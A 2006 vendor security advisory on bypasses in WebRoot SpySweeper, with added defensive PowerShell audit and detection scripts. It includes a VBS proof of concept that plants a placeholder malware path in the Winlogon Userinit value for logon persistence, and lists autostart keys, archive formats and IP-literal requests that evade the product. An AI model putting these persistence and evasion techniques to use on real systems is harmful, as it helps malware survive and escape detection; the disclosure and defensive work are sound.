Multiple Bypass and Integrity Lost Vulnerabilities
Sentinel Computer Security Advisory
Sentinel Co.
http://www.sentinel.gr
info@xxxxxxxxxxx
General Flaw Description : Multiple Bypass and Integrity Lost Vulnerabilities
-------------------------------------------------------------------------------
Advisory Information
-------------------------------------------------------------------------------
Advisory Release Date : 2006/06/20
Advisory ID : SGA-0001
Extends : None
Deprecates : None
-------------------------------------------------------------------------------
Product Information
-------------------------------------------------------------------------------
Software Product Name : SpySweeper
Product Version : All versions up to 4.5.9 Build 709
Product Vendor : WebRoot (http://www.webroot.com)
Flawed File Name : spysweeper.exe
File Version : All versions up to 4.5.9 Build 709
Default Local Path of the File : C:\Program Files\Webroot\Spysweeper\
-------------------------------------------------------------------------------
Vulnerability Information
-------------------------------------------------------------------------------
Flaw Type : Design Flaw
Operating Systems : All Microsoft Windows
Vulnerability Impact : Bypass Security Measures
Vulnerability Rating : Critical
Patch Status : Unpatched
Advisory Status : Verified
Publicity Level : Published
Other Advisories IDs : None
Flaw Discovery Date : 2006/05/30
Patch Date : None
Vulnerability Credit : Emmanouil Gavriil (egavriil@xxxxxxxxxxx)
Exploit Status : Not Released
Exploit Publication Date : None
-------------------------------------------------------------------------------
Description
-----------
WebRoot SpySweeper is an anti-spyware application that provides several
protective measures ("shields") for the computer it runs on. Several of these
measures can be bypassed with little effort, and the bypass methods described
below can be used by malware to evade the protection SpySweeper is supposed to
provide.
Technical Information
---------------------
The following vulnerabilities have been identified in WebRoot SpySweeper:
1) Bypassing the Startup Shield. Writing to registry keys that Windows uses as
autostart locations, but that the Startup Shield does not monitor, starts a
program at logon without triggering the shield.
2) Bypassing the Compression Sweep. Compression Sweep claims to detect malware
inside compressed files, but it appears to inspect only ZIP archives; malware
packed in any other archive format is not detected.
3) Bypassing the Spy Communication Shield. The shield appears to match only the
domain name of the site being visited. If the same site is requested by its IP
address, the Spy Communication Shield does not block the connection.
4) Loss of integrity due to incorrect detection of legitimate files (false
positives), and, conversely, evasion of detection by simply renaming a detected
file.
Proof of Concept Experiment
---------------------------
1) The following registry keys can be used to bypass the Startup Shield:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
HKEY_CLASSES_ROOT\exefile\shell\open\command @="\"%1\" %*"
HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\KeyName
(KeyName stands for any component subkey; the StubPath value of such a subkey
is executed once per user profile at logon.)
You can use the following script to prove the vulnerability (save the
following code as .vbs and run it with administrative rights, since it writes
under HKEY_LOCAL_MACHINE):
****************************************************************************
' Proof of concept: append a second program to the Winlogon Userinit value.
' C:\malware.exe is a placeholder path; this script only writes the registry
' value, it does not execute anything itself.
Dim WshShell
Set WshShell = WScript.CreateObject("WScript.Shell")

' Writes the (Default) value of the Winlogon key as a one-byte REG_BINARY. A
' trailing backslash makes RegWrite address a key's default value. This write
' is part of the original PoC; the bypass itself is the Userinit write below.
WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\", 1, "REG_BINARY"

' Userinit is a comma-separated list of programs winlogon starts at logon. The
' stock value contains only userinit.exe; anything appended runs as well.
WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit", _
    "C:\WINDOWS\system32\userinit.exe, C:\malware.exe", "REG_SZ"

WScript.Echo "There is an entry at: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit " & _
    "with Value 'C:\WINDOWS\system32\userinit.exe, C:\malware.exe'. " & _
    "After the execution of userinit.exe, malware.exe could be run!"
****************************************************************************
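The check an administrator would want alongside the PoC above is an audit of the same four autostart locations. The following PowerShell script is an added example written for this page; it is not part of the advisory and not WebRoot's code. It assumes the stock values are "<windir>\system32\userinit.exe," for Userinit, "explorer.exe" for Shell and "%1" %* for the exefile handler, and it lists every Active Setup component that has a StubPath, since many legitimate components do and these need review rather than an automatic verdict.

```powershell
# Added example (not from the advisory or from SpySweeper): audit the four
# autostart locations the advisory lists and report deviations from the stock
# values. Assumed stock values: Userinit = "<windir>\system32\userinit.exe,"
# Shell = "explorer.exe", exefile\shell\open\command = "%1" %*.

function Get-StartupShieldGaps {
    $winlogon    = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    $exefile     = 'Registry::HKEY_CLASSES_ROOT\exefile\shell\open\command'
    $activeSetup = 'HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components'
    $findings    = New-Object System.Collections.Generic.List[string]

    # Userinit is a comma-separated list; anything besides userinit.exe runs at logon.
    $expectedUserinit = Join-Path $env:windir 'system32\userinit.exe'
    $userinit = (Get-ItemProperty -Path $winlogon -Name Userinit).Userinit
    foreach ($entry in ($userinit -split ',')) {
        $e = $entry.Trim()
        if ($e -and $e -ine $expectedUserinit) {
            $findings.Add("Userinit: extra entry '$e'")
        }
    }

    # Shell: replacing or appending to explorer.exe runs the extra program per logon.
    $shell = (Get-ItemProperty -Path $winlogon -Name Shell).Shell
    if ($shell -ine 'explorer.exe') {
        $findings.Add("Shell: '$shell' (expected explorer.exe)")
    }

    # exefile handler: any change here wraps every .exe the user launches.
    $cmd = (Get-ItemProperty -Path $exefile -Name '(default)').'(default)'
    if ($cmd -ne '"%1" %*') {
        $findings.Add("exefile\shell\open\command: '$cmd' (expected `"%1`" %*)")
    }

    # Active Setup: each component's StubPath runs once per user profile at logon.
    # Listed for review; legitimate Windows components appear here too.
    Get-ChildItem -Path $activeSetup -ErrorAction SilentlyContinue | ForEach-Object {
        $stub = (Get-ItemProperty -Path $_.PSPath -ErrorAction SilentlyContinue).StubPath
        if ($stub) {
            $findings.Add("ActiveSetup $($_.PSChildName): StubPath '$stub'")
        }
    }

    return $findings
}

$gaps = Get-StartupShieldGaps
if ($gaps.Count -eq 0) { 'No deviations from stock values found.' } else { $gaps }
```

Run it before and after the VBS proof of concept: the second run should report the extra Userinit entry. Reading these keys needs no elevation; only the write in the PoC does.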
2) Compressed-file scanning can be bypassed by packing the malware in any of
the following formats instead of ZIP:
RAR, GZ, TAR, CAB, ACE
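A scanner that wants to recurse into every container has to recognise the container by content, not by extension; a RAR renamed to .txt is still a RAR. The following PowerShell script is an added example for this page, not code from the advisory or from SpySweeper. It identifies ZIP and the five formats listed above from their published magic bytes (ZIP "PK\x03\x04" at 0, RAR "Rar!\x1a\x07" at 0, gzip 0x1F 0x8B at 0, CAB "MSCF" at 0, ACE "**ACE**" at offset 7, TAR "ustar" at offset 257) and runs over constructed in-memory headers rather than real archives.

```powershell
# Added example (not from the advisory or from SpySweeper): identify an archive
# by magic bytes rather than by file extension. Signatures are the published
# ones for each format; the samples at the bottom are constructed headers.

function Test-Signature([byte[]]$Bytes, [int]$Offset, [byte[]]$Sig) {
    # True when $Bytes contains $Sig starting at $Offset.
    if ($Bytes.Length -lt $Offset + $Sig.Length) { return $false }
    for ($i = 0; $i -lt $Sig.Length; $i++) {
        if ($Bytes[$Offset + $i] -ne $Sig[$i]) { return $false }
    }
    return $true
}

function Get-ArchiveFormatFromBytes {
    param([byte[]]$Bytes)
    $ascii = [System.Text.Encoding]::ASCII
    if (Test-Signature $Bytes 0   ([byte[]](0x50,0x4B,0x03,0x04)))              { return 'ZIP' }
    if (Test-Signature $Bytes 0   ($ascii.GetBytes('Rar!') + [byte[]](0x1A,0x07))) { return 'RAR' }
    if (Test-Signature $Bytes 0   ([byte[]](0x1F,0x8B)))                        { return 'GZ'  }
    if (Test-Signature $Bytes 0   ($ascii.GetBytes('MSCF')))                    { return 'CAB' }
    if (Test-Signature $Bytes 7   ($ascii.GetBytes('**ACE**')))                 { return 'ACE' }
    if (Test-Signature $Bytes 257 ($ascii.GetBytes('ustar')))                   { return 'TAR' }
    return $null
}

function Get-ArchiveFormat {
    param([string]$Path)
    # Only the first 512 bytes matter; the TAR marker at offset 257 is the furthest signature.
    $stream = [System.IO.File]::OpenRead($Path)
    try {
        $buf = New-Object byte[] 512
        $n = $stream.Read($buf, 0, $buf.Length)
    } finally { $stream.Close() }
    if ($n -eq 0) { return $null }
    return Get-ArchiveFormatFromBytes -Bytes $buf[0..($n - 1)]
}

# Constructed samples (headers only, not real archives). The first one mimics a
# RAR file whose extension was changed to hide it from extension-based scanning.
$ascii = [System.Text.Encoding]::ASCII
$samples = [ordered]@{
    'renamed.txt (RAR header)' = $ascii.GetBytes('Rar!') + [byte[]](0x1A,0x07,0x00)
    'update.cab'               = $ascii.GetBytes('MSCF') + (New-Object byte[] 32)
    'backup.tar'               = (New-Object byte[] 257) + $ascii.GetBytes('ustar')
    'plain.txt'                = $ascii.GetBytes('hello world')
}
foreach ($name in $samples.Keys) {
    $fmt = Get-ArchiveFormatFromBytes -Bytes $samples[$name]
    Write-Output ("{0,-26} -> {1}" -f $name, $(if ($fmt) { $fmt } else { 'not an archive' }))
}
```

Use Get-ArchiveFormat on a directory of suspect files to see which ones a ZIP-only sweep would skip; the decision to recurse should depend on the returned format, never on the name.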
3) Spy Communication Shield bypass proof of concept:
banners.pennyweb.com is on the block list and is blocked when requested by name.
63.208.235.96, the address of that host, is not blocked when requested directly.
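The root cause is a check that compares the literal host in the request with the block list. The following PowerShell script, an added example for this page and not code from the advisory or from SpySweeper, puts the name-only check beside one that also catches IP-literal requests by comparing them with the addresses the blocked names resolve to. The resolver is a parameter so the demonstration runs offline; the lookup table is constructed from the host and address in the PoC above and is not live DNS data.

```powershell
# Added example (not from the advisory or from SpySweeper): a name-only block
# check next to one that also blocks the resolved addresses of listed names.

function Test-BlockedByName {
    param([string]$Target, [string[]]$BlockedDomains)
    # The weak check: the requested host must literally match a listed domain.
    return ($BlockedDomains -contains $Target.ToLowerInvariant())
}

function Test-BlockedByNameOrAddress {
    param(
        [string]$Target,
        [string[]]$BlockedDomains,
        # Default resolver uses real DNS; the demo below injects an offline table.
        [scriptblock]$Resolve = {
            param($Name)
            [System.Net.Dns]::GetHostAddresses($Name) | ForEach-Object { $_.ToString() }
        }
    )
    if (Test-BlockedByName -Target $Target -BlockedDomains $BlockedDomains) { return $true }

    # If the request carries an address instead of a name, compare it with the
    # addresses every blocked name currently resolves to.
    $addr = $null
    if ([System.Net.IPAddress]::TryParse($Target, [ref]$addr)) {
        foreach ($domain in $BlockedDomains) {
            $resolved = @(& $Resolve $domain)
            if ($resolved -contains $addr.ToString()) { return $true }
        }
    }
    return $false
}

# Constructed resolver table standing in for DNS (values from the PoC above).
$fakeDns = @{ 'banners.pennyweb.com' = @('63.208.235.96') }
$offlineResolve = { param($Name) $fakeDns[$Name.ToLowerInvariant()] }.GetNewClosure()
$blocklist = @('banners.pennyweb.com')

foreach ($req in 'banners.pennyweb.com', '63.208.235.96') {
    $weak  = Test-BlockedByName -Target $req -BlockedDomains $blocklist
    $fixed = Test-BlockedByNameOrAddress -Target $req -BlockedDomains $blocklist -Resolve $offlineResolve
    Write-Output ("{0,-22} name-only: {1,-5} name-or-address: {2}" -f $req, $weak, $fixed)
}
```

Two caveats apply to the stronger check: DNS answers change, so the address comparison must use fresh resolutions rather than a cached list, and a shared hosting address will block every site behind it. The robust enforcement point is therefore the destination address of the actual connection, not the host string in the request.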
4) 90.dl and/or 51.dl are valid ARRISCAD (www.arriscad.com) drawing list files.
SpySweeper tends to remove these files, and such a removal can destroy an
ARRISCAD database. It is also unclear why even an empty file named 90.dl or
ieonflow.dll is classified as adware or spyware; this indicates that detection
of these items is based on the file name rather than on file content.
Conversely, renaming some malware files (e.g. ieonflow.dll) is enough to evade
detection by SpySweeper.
Patch Description and Information
---------------------------------
The vendor has been informed. No reply has been received and no patch has been
released.
References and Other Resources for Information
----------------------------------------------
None.
EOF.